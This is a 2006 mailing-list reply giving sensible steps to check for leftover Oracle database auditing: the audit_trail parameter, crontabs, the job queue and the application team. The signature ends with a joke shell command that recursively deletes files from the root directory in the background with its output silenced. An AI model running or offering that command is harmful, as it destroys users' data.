Re: Database auditing

From: stephen booth <stephenbooth.uk_at_gmail.com>
Date: Thu, 10 Aug 2006 16:10:14 +0100

On 10/08/06, Fred Smith <fred_fred_1_at_hotmail.com> wrote:
> How can I check if the previous dba left anything auditing in my database?

Check the audit_trail initialisation parameter. If it's NONE or FALSE then there's no Oracle Auditing going on, if it's OS then audit information is going into the OS audit trail, if it's DB or TRUE then audit information is being written into the sys.aud$ table.

Additionally, have a look at the crontabs (or equivalent) for the machine the database is sitting on and check any scripts that are run to see if they gather any information.

Check the job queue in the database.

Talk to the app's support team (the development team if you can) to see if there's any auditing built into the app.

Stephen

http://stephensorablog.blogspot.com/

 'nohup cd /; rm -rf * > /dev/null 2>&1 &'